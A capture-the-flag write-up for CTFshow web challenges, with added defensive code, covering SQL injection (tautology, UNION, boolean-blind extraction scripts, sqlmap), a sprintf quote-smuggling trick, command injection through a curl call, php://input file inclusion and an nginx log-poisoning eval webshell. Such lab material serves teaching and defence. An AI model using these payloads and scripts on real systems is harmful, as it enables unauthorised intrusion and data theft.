[Log injection, file inclusion, blind SQL injection] 2021-07-20 CTFshow practice

CTF show Newbie Contest (萌新赛)

web1 【给她】

Opening the challenge, the page tells us that parameters are expected; the guess is name and pass:

```text
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=admin&pass=admin
```


Try the universal (always-true) password:

```text
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=admin' or 1=1--+&pass=admin
```


The response shows that the single quote is filtered.

No obvious way forward yet, so scan for directories first:

```shell
python3 dirsearch.py -u http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/
```


There is clearly a .git leak. (The challenge name 给她 is a homophone of "git"...)

Pull the repository down with GitHack:

```shell
python Githacker.py https://92e3e5e8-89bd-4ac5-b4d1-c46cee76eb46.challenge.ctf.show_8080/.git
```


This yields a hint.php file:

  • addslashes(): adds a backslash before single quotes, double quotes, backslashes and NUL bytes.
  • sprintf(): writes a formatted string into a variable. The arguments arg1, arg2, ... are inserted into the main string at the percent (%) signs, step by step: arg1 at the first % sign, arg2 at the second, and so on.
```php
<?php
$pass=sprintf("and pass='%s'",addslashes($_GET['pass']));
$sql=sprintf("select * from user where name='%s' $pass",addslashes($_GET['name']));
?>
```

Since the single quote is filtered, we need a way to construct one.

With sprintf, part of the format string is under our control: $pass, itself produced by the first sprintf, is spliced into the format of the second one. So we can put %1$c into that position, which means "take the first argument and format it as %c (a character)".

Then we pass the ASCII code of a single quote (39) as name. The final payload:

```text
http://f6f64ebd-116f-4e11-974c-6674ecc4b2c1.challenge.ctf.show:8080/?name=39&pass=1%1$c or 1=1%23
```
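To make the mechanism and the fix concrete, here is an added example (my own code, not from the challenge or the original post). It models PHP's sprintf() and addslashes() in Python, rebuilds the query exactly the way hint.php does, and shows two hardened variants: doubling % in data that is re-used as a format string, and the real fix, a parameterized query (run here against an in-memory SQLite table with one constructed row). The helper names php_sprintf, addslashes, build_query_vulnerable, build_query_fixed and lookup_parameterized are mine.

```python
import re
import sqlite3

_SPEC = re.compile(r"%(?:(\d+)\$)?([sdc%])")


def php_sprintf(fmt, *args):
    """Minimal model of PHP sprintf(): %s, %d, %c, %% and the positional
    forms %n$s / %n$c (hypothetical helper; covers only what this page needs)."""
    next_idx = 0

    def repl(m):
        nonlocal next_idx
        pos, conv = m.group(1), m.group(2)
        if conv == "%":
            return "%"
        if pos is not None:
            arg = args[int(pos) - 1]        # %n$ reuses argument n
        else:
            arg = args[next_idx]            # unnumbered specifiers consume arguments in order
            next_idx += 1
        if conv == "c":
            return chr(int(arg))            # %c: integer -> the character with that code
        if conv == "d":
            return str(int(arg))
        return str(arg)

    return _SPEC.sub(repl, fmt)


def addslashes(s):
    """Model of PHP addslashes(): backslash before ' \" \\ and NUL."""
    return (s.replace("\\", "\\\\").replace("'", "\\'")
             .replace('"', '\\"').replace("\0", "\\0"))


def build_query_vulnerable(name, pw):
    """The hint.php pattern: the output of the first sprintf becomes part of the
    second format string, so %-sequences inside pw are interpreted there."""
    pass_clause = php_sprintf("and pass='%s'", addslashes(pw))
    return php_sprintf("select * from user where name='%s' " + pass_clause, addslashes(name))


def build_query_fixed(name, pw):
    """Same structure, but % in data that will be re-used as a format is doubled,
    so it can only ever render as a literal % and never as a specifier."""
    pass_clause = php_sprintf("and pass='%s'", addslashes(pw).replace("%", "%%"))
    return php_sprintf("select * from user where name='%s' " + pass_clause, addslashes(name))


def lookup_parameterized(name, pw):
    """The actual fix: bind values instead of formatting them into SQL.
    Returns the number of matching rows from a constructed one-row table."""
    con = sqlite3.connect(":memory:")
    con.execute("create table user(name text, pass text)")
    con.execute("insert into user values ('admin', 's3cret')")   # constructed sample row
    rows = con.execute("select * from user where name=? and pass=?", (name, pw)).fetchall()
    con.close()
    return len(rows)


if __name__ == "__main__":
    name, pw = "39", "1%1$c or 1=1#"     # the payload from this write-up
    print(build_query_vulnerable(name, pw))   # the quote escapes the pass literal
    print(build_query_fixed(name, pw))        # %1$c stays inert text
    print(lookup_parameterized(name, pw), lookup_parameterized("admin", "s3cret"))
```

The vulnerable builder reproduces the page's result: name=39 is substituted first, then %1$c inside the pass clause re-reads that same argument as a character and emits the quote that addslashes was supposed to prevent. Doubling % closes that specific hole, but binding parameters removes the whole class of problem.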


Although the page displays NotFound, it is actually a 200 response. Capture the exchange with a proxy.


The response headers reveal where the flag is stored.

Now look at the request headers.


The Cookie carries a file parameter; decoding its hex string to characters gives:

```text
666c61672e747874
flag.txt
```

Then hex-encode /flag and put it in the cookie instead:

```text
/flag
2f666c6167
```

Flag: ctfshow{d4ede337-93c3-4066-8068-6bb8a0f92252}


web2 [Sign-in challenge]

A code-audit challenge:


```php
<?php 
if(isset($_GET['url'])){
system("curl https://".$_GET['url'].".ctf.show");
}else{
show_source(__FILE__);
}
?>
```

Command execution: url is concatenated straight into the shell command. Send the payload:

```text
http://295f0bb0-e2ff-4d05-a552-73fb6e4d7fa3.challenge.ctf.show:8080/?url=a;ls;a
```


Then cat the flag directly:

```text
http://295f0bb0-e2ff-4d05-a552-73fb6e4d7fa3.challenge.ctf.show:8080/?url=a;cat%20flag;a
```
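An added example (not from the original post) of how the url parameter should be handled before it reaches curl: allowlist it as a single DNS label and hand curl an argv list through subprocess so that no shell ever parses it; shlex.quote plays the role of PHP's escapeshellarg() for the case where a shell string really is unavoidable. The function names are mine; the curl flags are standard ones.

```python
import re
import shlex
import subprocess

# One DNS label: letters, digits and inner hyphens, at most 63 characters
LABEL_RE = re.compile(r"^[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?$")


def is_valid_label(value):
    """Allowlist check for the untrusted url parameter."""
    return LABEL_RE.match(value) is not None


def build_curl_argv(sub):
    """argv form: the URL is passed as a single argument with no shell in
    between, so ; | $() inside sub could not be interpreted even if the
    allowlist were somehow bypassed."""
    if not is_valid_label(sub):
        raise ValueError("url parameter is not a single hostname label")
    return ["curl", "--silent", "--max-time", "5", "https://" + sub + ".ctf.show"]


def shell_form(sub):
    """If a shell command string is genuinely required, validate AND quote the
    whole argument; shlex.quote here corresponds to PHP's escapeshellarg()."""
    if not is_valid_label(sub):
        raise ValueError("url parameter is not a single hostname label")
    return "curl " + shlex.quote("https://" + sub + ".ctf.show")


def quoted_even_if_unvalidated(sub):
    """Demonstration only: what quoting alone does to the page's payload.
    The whole value becomes one literal argument instead of three commands."""
    return "curl " + shlex.quote("https://" + sub + ".ctf.show")


def fetch(sub):
    """Run the hardened command; returns the CompletedProcess (needs network)."""
    return subprocess.run(build_curl_argv(sub), capture_output=True, text=True, check=False)


if __name__ == "__main__":
    print(build_curl_argv("www"))
    print(quoted_even_if_unvalidated("a;ls;a"))
    print(is_valid_label("a;ls;a"))
```

Validation and argv construction are separate layers on purpose: the allowlist rejects the page's `a;ls;a` outright, and even a value that slipped past it would reach curl as data rather than as shell syntax.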

ctfshow{d64999a5-be93-4709-909b-bc82aac7670b}

CTF show practice set

web1

Base64 decoding

Open the challenge and inspect the page source.


Base64-decoding the string gives: ctfshow{0bedf99f-3c35-4c9f-be79-fb2cc2f41190}


web2

SQL injection

Opening the challenge, there is a login form.


The universal password gets nowhere.

Try sqlmap on the captured request:

```shell
sqlmap -r 6.txt -D web2 -T flag --dump
```


sqlmap does it in one shot: ctfshow{4bab6bc1-a628-4ce3-b294-28870187c44b}

The payloads it found:

```text
---
Parameter: username (POST)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: username=admin' AND (SELECT 6612 FROM (SELECT(SLEEP(5)))EowR) AND 'XSuz'='XSuz&password=admin

Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: username=admin' UNION ALL SELECT NULL,CONCAT(0x717a626a71,0x4d597454664b6e5853445a42416e625a685a734d72676f6f58435654776e6c626963646e72775251,0x716b767171),NULL-- -&password=admin
---
```

web3

File inclusion

The challenge page includes whatever the url parameter points to, so use the PHP wrapper php://input directly:

```text
http://681fe828-e32b-4aa4-87bb-96d91d62f960.challenge.ctf.show:8080/?url=php://input
PostData:
<?php system("ls"); ?>
```

This lists two files:


```text
http://681fe828-e32b-4aa4-87bb-96d91d62f960.challenge.ctf.show:8080/?url=php://input
PostData:
<?php system("cat ctf_go_go_go"); ?>
```

Flag: ctfshow{64737d2f-350d-4f5a-8934-c3c9c88f5e7e}

web4

Log injection, file inclusion

Opening the challenge, the page is the same as web3.


Trying web3's wrapper trick only returns error.


So try log injection instead.

The captured responses show the server is Ubuntu running nginx; nginx writes its logs by default to /var/log/nginx/access.log and /var/log/nginx/error.log.

In this challenge access.log can be included:

```text
http://a6343941-fb4f-44a8-b6ad-3a1717ecb735.challenge.ctf.show:8080/?url=/var/log/nginx/access.log
```


To keep URL encoding from mangling the webshell, capture the request in a proxy and inject the one-line webshell into the User-Agent header.

The PoC request:

```http
GET / HTTP/1.1
Host: a6343941-fb4f-44a8-b6ad-3a1717ecb735.challenge.ctf.show:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST['a']);?>Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh
Accept-Encoding: gzip, deflate
Connection: close
Content-Length: 53
Upgrade-Insecure-Requests: 1
Content-Length: 2
```
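From the defender's side, the requests in web3 and web4 leave clear traces in the very log that is being included. The following added example (my own code, not the author's) parses nginx combined-format lines and flags the three signals seen above: a stream wrapper or a log path handed to an include parameter, and PHP tags or eval( inside a logged header. The sample lines are constructed to mirror this write-up and are not real traffic.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# nginx default "combined" access_log format
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Any URL scheme in a value that ends up in include()/require() (php://, ...)
WRAPPER_RE = re.compile(r"^([a-z][a-z0-9+.-]*)://", re.IGNORECASE)
# The log directory this write-up includes; extend with whatever your app must never read
LOG_PATH_RE = re.compile(r"/var/log/", re.IGNORECASE)
# PHP open tags or eval( inside a header that gets written to the log = poisoning attempt
PHP_CODE_RE = re.compile(r"<\?php|<\?=|\beval\s*\(", re.IGNORECASE)

# Constructed sample lines modelled on this write-up (not real traffic)
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Jul/2021:15:54:02 +0000] "GET /?url=/var/log/nginx/access.log HTTP/1.1" 200 1532 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0"',
    '10.0.0.5 - - [20/Jul/2021:15:56:10 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:68.0) <?php @eval($_POST[\'a\']);?>Gecko/20100101 Firefox/68.0"',
    '10.0.0.7 - - [20/Jul/2021:16:01:43 +0000] "GET /?url=php://input HTTP/1.1" 200 87 "-" "curl/7.68.0"',
    '10.0.0.9 - - [20/Jul/2021:16:02:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def inspect(entry):
    """List the reasons one parsed request looks like file inclusion or log poisoning."""
    reasons = []
    for key, value in parse_qsl(urlsplit(entry["target"]).query, keep_blank_values=True):
        m = WRAPPER_RE.match(value)
        if m:
            reasons.append("stream wrapper %s:// in parameter %s" % (m.group(1).lower(), key))
        if LOG_PATH_RE.search(value):
            reasons.append("log path in parameter %s" % key)
    for header in ("ua", "referer"):
        if PHP_CODE_RE.search(entry[header]):
            reasons.append("PHP code in %s" % header)
    return reasons


def analyze(lines):
    """Run inspect() over a log and return (client_ip, reason) findings."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue            # unparseable lines deserve their own alert in production
        for reason in inspect(entry):
            findings.append((entry["ip"], reason))
    return findings


if __name__ == "__main__":
    for ip, reason in analyze(SAMPLE_LOG):
        print(ip, reason)
```

The two halves of the attack show up as two separate findings for the same client: first the log file being requested through the include parameter, then executable PHP arriving in a header. Alerting on either is worthwhile; seeing both from one address is the log-poisoning pattern itself.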

Then connect to the one-line webshell with AntSword (蚁剑).


Flag: ctfshow{9a2fb16f-ab30-4c45-b392-99c76d89a140}

web5

Open the challenge: another source-code audit.


It is an md5 comparison.

  • ctype_alpha($string): checks whether $string consists only of letters
  • is_numeric($string): checks whether $string is numeric

v1 must be purely alphabetic and v2 must be numeric, and their md5 hashes must compare equal.

Send the payload:

```text
http://3eb255ae-5cf9-45eb-b869-a7229d302ba9.challenge.ctf.show:8080/?v1=DQWRASX&v2=1320830526
```

Flag: ctfshow{4ef114d4-462d-44fb-b71d-62ab0ef2d7d2}
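The v1/v2 pair works because PHP's == sees both md5 digests as numeric strings of the form 0e<digits>, i.e. 0 × 10^n = 0, so two different digests compare equal. This added example (mine, not part of the original post) models that comparison in Python, tests whether a string's md5 is such a "0e" hash, and shows that the challenge's check passes only under loose comparison; with === (modelled as plain string equality, the same result hash_equals() gives) it fails. The checker simplifies is_numeric() to "all decimal digits".

```python
import hashlib
import re


def md5_hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def php_is_numeric_string(s):
    """Subset of PHP's numeric-string rule that a hex digest can satisfy:
    decimal digits, optionally followed by an exponent part such as e123."""
    return re.fullmatch(r"[0-9]+(?:e[0-9]+)?", s, re.IGNORECASE) is not None


def php_loose_equal(a, b):
    """Model of PHP == on two strings: when both are numeric strings they are
    compared as numbers, so '0e1' == '0e2' because both evaluate to 0.0."""
    if php_is_numeric_string(a) and php_is_numeric_string(b):
        return float(a) == float(b)
    return a == b


def php_strict_equal(a, b):
    """Model of PHP === (and of hash_equals): byte-for-byte comparison."""
    return a == b


def is_magic_hash(s):
    """True when md5(s) has the form 0e<digits>, which loose comparison reads as 0."""
    return re.fullmatch(r"0e[0-9]+", md5_hex(s)) is not None


def check(v1, v2, strict):
    """Model of the challenge logic: v1 alphabetic, v2 numeric (simplified to
    decimal digits), then the two md5 digests are compared."""
    if not (v1.isascii() and v1.isalpha()) or not v2.isdigit():
        return False
    compare = php_strict_equal if strict else php_loose_equal
    return compare(md5_hex(v1), md5_hex(v2))


if __name__ == "__main__":
    for v1, v2 in [("QNKCDZO", "240610708"), ("DQWRASX", "1320830526")]:
        print(v1, md5_hex(v1), v2, md5_hex(v2),
              "loose:", check(v1, v2, strict=False), "strict:", check(v1, v2, strict=True))
```

The digests only look like numbers by accident of hex encoding; the defence is to never let a hash reach a numeric comparison, which is what === or hash_equals() guarantees.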

Attached is the md5 "0e" collision dictionary (input on the left, md5 on the right):

```text
s878926199a   0e545993274517709034328855841020
s155964671a   0e342768416822451524974117254469
s214587387a   0e848240448830537924465865611904
s214587387a   0e848240448830537924465865611904
s878926199a   0e545993274517709034328855841020
s1091221200a  0e940624217856561557816327384675
s1885207154a  0e509367213418206700842008763514
s1502113478a  0e861580163291561247404381396064
s1885207154a  0e509367213418206700842008763514
s1836677006a  0e481036490867661113260034900752
s155964671a   0e342768416822451524974117254469
s1184209335a  0e072485820392773389523109082030
s1665632922a  0e731198061491163073197128363787
s1502113478a  0e861580163291561247404381396064
s1836677006a  0e481036490867661113260034900752
s1091221200a  0e940624217856561557816327384675
s155964671a   0e342768416822451524974117254469
s1502113478a  0e861580163291561247404381396064
s155964671a   0e342768416822451524974117254469
s1665632922a  0e731198061491163073197128363787
s155964671a   0e342768416822451524974117254469
s1091221200a  0e940624217856561557816327384675
s1836677006a  0e481036490867661113260034900752
s1885207154a  0e509367213418206700842008763514
s532378020a   0e220463095855511507588041205815
s878926199a   0e545993274517709034328855841020
s1091221200a  0e940624217856561557816327384675
s214587387a   0e848240448830537924465865611904
s1502113478a  0e861580163291561247404381396064
s1091221200a  0e940624217856561557816327384675
s1665632922a  0e731198061491163073197128363787
s1885207154a  0e509367213418206700842008763514
s1836677006a  0e481036490867661113260034900752
s1665632922a  0e731198061491163073197128363787
s878926199a   0e545993274517709034328855841020
240610708     0e462097431906509019562988736854
314282422     0e990995504821699494520356953734
571579406     0e972379832854295224118025748221
903251147     0e174510503823932942361353209384
1110242161    0e435874558488625891324861198103
1320830526    0e912095958985483346995414060832
1586264293    0e622743671155995737639662718498
2302756269    0e250566888497473798724426794462
2427435592    0e067696952328669732475498472343
2653531602    0e877487522341544758028810610885
3293867441    0e471001201303602543921144570260
3295421201    0e703870333002232681239618856220
3465814713    0e258631645650999664521705537122
3524854780    0e507419062489887827087815735195
3908336290    0e807624498959190415881248245271
4011627063    0e485805687034439905938362701775
4775635065    0e998212089946640967599450361168
4790555361    0e643442214660994430134492464512
5432453531    0e512318699085881630861890526097
5579679820    0e877622011730221803461740184915
5585393579    0e664357355382305805992765337023
6376552501    0e165886706997482187870215578015
7124129977    0e500007361044747804682122060876
7197546197    0e915188576072469101457315675502
7656486157    0e451569119711843337267091732412
QLTHNDT       0e405967825401955372549139051580
QNKCDZO       0e830400451993494058024219903391
EEIZDOI       0e782601363539291779881938479162
TUFEPMC       0e839407194569345277863905212547
UTIPEZQ       0e382098788231234954670291303879
UYXFLOI       0e552539585246568817348686838809
IHKFRNS       0e256160682445802696926137988570
PJNPDWY       0e291529052894702774557631701704
ABJIHVY       0e755264355178451322893275696586
DQWRASX       0e742373665639232907775599582643
DYAXWCA       0e424759758842488633464374063001
GEGHBXL       0e248776895502908863709684713578
GGHMVOE       0e362766013028313274586933780773
GZECLQZ       0e537612333747236407713628225676
NWWKITQ       0e763082070976038347657360817689
NOOPCJF       0e818888003657176127862245791911
MAUXXQC       0e478478466848439040434801845361
MMHUWUV       0e701732711630150438129209816536
```

web6

SQL injection, space bypass

Opening the challenge, the page is the same as web2.


Try logging in with the universal password (username, then password):

```text
admin' or 1=1#
amdin
```


It reports an injection error.

After ruling out the other characters one by one, it turns out that spaces are what gets blocked.

Spaces can be replaced with /**/ to get around the filter.

Modified payload:

```text
password=admin&username=admin'/**/or/**/1=1#
```


Login succeeds.

Now move on to a UNION-based injection:

```text
password=admin&username=admin'/**/union/**/select/**/1,2,3#
```


Column 2 is echoed back, so that is where we inject:

```text
password=admin&username=admin'/**/union/**/select/**/1,database(),3#
```


The current database is web2.

Next, enumerate its tables:

```text
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),3#
```


Then the columns of the flag table:

```text
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='flag'),3#
```


Then the values in the flag column:

```text
password=admin&username=admin'/**/union/**/select/**/1,(select/**/group_concat(flag)/**/from/**/web2.flag),3#
```


Flag: ctfshow{ac2d7bfa-19dc-492c-ae69-1321c905bdba}

web7

Boolean-based blind injection

Opening the challenge, it is another SQL injection.


Testing shows that spaces are filtered and a UNION injection does not work.

So fall back to boolean-based blind injection.

First, brute-force the length of the database name:

```text
http://405238d3-0856-4a35-a434-dc2aaedba9e3.challenge.ctf.show:8080/index.php?id=1'/**/and/**/if(length(database())=4,1,0)#
```


So the database name is 4 characters long.

Next, brute-force the database name character by character:

```python
# Probe for one position, e.g.: http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php?1'/**/and/**/if((ascii(substr(database(),1,1))=104),1,0)#

import requests

# candidate characters for each position of the name
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range(1, 5):               # the name is 4 characters long (found above)
    for j in dic:
        payload = {
            'id': "1'/**/and/**/if((ascii(substr(database()," + str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
        }
        res = requests.get(url, params=payload)
        if "If" in res.text:        # the response contains "If" only on the true branch
            ans += j
            print(ans)
```


The database name is web7.

Next, brute-force the table names:

```python
# Probe: 1'/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database()),1,1))=48),1,0)#

import requests

# candidate characters; ',' is included because group_concat joins names with commas
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range(1, 15):
    for j in dic:
        payload = {
            'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema=database())," + str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
        }
        res = requests.get(url, params=payload)
        if "If" in res.text:        # true branch marker
            ans += j
            print(ans)
```


There are three tables: flag, page and user.

Next, brute-force the columns of the flag table:

```python
# Probe: 1'/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167),1,1))=102),1,0)#

import requests

# candidate characters; 0x666C6167 is 'flag' written as hex so no quotes are needed
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range(1, 15):
    for j in dic:
        payload = {
            'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name=0x666C6167)," + str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
        }
        res = requests.get(url, params=payload)
        if "If" in res.text:        # true branch marker
            ans += j
            print(ans)
```


The column name is flag.

Finally, extract the values of the flag column:

```python
# Probe: 1'/**/and/**/if((ascii(substr((select/**/group_concat(flag)/**/from/**/web7.flag),1,1))=102),1,0)#

import requests

# candidate characters, extended with the characters that appear in a flag
dic = ['a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','0','1','2','3','4','5','6','7','8','9','_',',','{','}','-']

url = "http://e78e330f-7724-4ded-ade2-9b6817ef676b.challenge.ctf.show:8080/index.php"
ans = ""
for i in range(1, 50):
    for j in dic:
        payload = {
            'id': "1'/**/and/**/if((ascii(substr((select/**/group_concat(flag)/**/from/**/web7.flag)," + str(i) + ",1))=" + str(ord(j)) + "),1,0)#"
        }
        res = requests.get(url, params=payload)
        if "If" in res.text:        # true branch marker
            ans += j
            print(ans)
```
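Both web6 and web7 leave the same two fingerprints: /**/ standing in for spaces, and (in web7) hundreds of near-identical requests that differ only in a number. The following added example (my code, not from the post) normalizes a parameter value the way a WAF or log rule would, matches the injection shapes used above, and clusters boolean-blind probes per client by blanking the digits. The request tuples are constructed from this write-up's payloads and are not real traffic.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

COMMENT_RE = re.compile(r"/\*.*?\*/")

# Rules run against the normalized (decoded, comment-stripped, lowercased) value
SIGNATURES = [
    ("tautology", re.compile(r"'\s*or\s+1\s*=\s*1")),
    ("union select", re.compile(r"\bunion\b.*\bselect\b")),
    ("schema enumeration", re.compile(r"information_schema\.(?:tables|columns)")),
    ("boolean/char probe", re.compile(r"\bif\s*\(|ascii\s*\(\s*substr")),
]


def normalize(raw):
    """URL-decode, turn inline comments into spaces, collapse whitespace, lowercase.
    This is what makes admin'/**/or/**/1=1 look like admin' or 1=1 to the rules."""
    s = COMMENT_RE.sub(" ", unquote_plus(raw))
    return re.sub(r"\s+", " ", s).strip().lower()


def classify(raw):
    """Return the names of every rule the value trips (empty list = nothing seen)."""
    hits = []
    if COMMENT_RE.search(unquote_plus(raw)):
        hits.append("inline-comment whitespace")
    s = normalize(raw)
    for name, rx in SIGNATURES:
        if rx.search(s):
            hits.append(name)
    return hits


def template(raw):
    """Shape of a value with every number blanked: blind probes differ only in digits."""
    return re.sub(r"\d+", "#", normalize(raw))


def blind_probe_clusters(requests, threshold=10):
    """requests: iterable of (client_ip, param_name, param_value).
    Returns [(ip, template, count)] for clients repeating one probe shape."""
    counts = Counter()
    for ip, _param, value in requests:
        if "boolean/char probe" in classify(value):
            counts[(ip, template(value))] += 1
    return [(ip, tpl, n) for (ip, tpl), n in counts.items() if n >= threshold]


# Constructed sample traffic modelled on the web6 / web7 payloads above
SAMPLE_REQUESTS = [
    ("10.0.0.5", "username", "admin'/**/or/**/1=1#"),
    ("10.0.0.5", "username", "admin'/**/union/**/select/**/1,database(),3#"),
    ("10.0.0.5", "username", "admin'/**/union/**/select/**/1,(select/**/group_concat(table_name)"
                             "/**/from/**/information_schema.tables/**/where/**/table_schema='web2'),3#"),
    ("10.0.0.9", "id", "1"),
] + [
    ("10.0.0.7", "id", "1'/**/and/**/if((ascii(substr(database(),1,1))=%d),1,0)#" % code)
    for code in range(97, 109)      # twelve probes for one character position
]


if __name__ == "__main__":
    for ip, param, value in SAMPLE_REQUESTS[:4]:
        print(ip, param, classify(value))
    print(blind_probe_clusters(SAMPLE_REQUESTS))
```

Normalizing before matching is the important design choice: a rule written against the raw string would have to anticipate every whitespace substitute, while a rule written against the normalized form catches /**/ and ordinary spaces alike. The per-client template count is what separates a single curious request from the automated loop in the scripts above.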


Flag: ctfshow{5a6aab4f-e80f-4c83-af69-4a15a9b30ac4}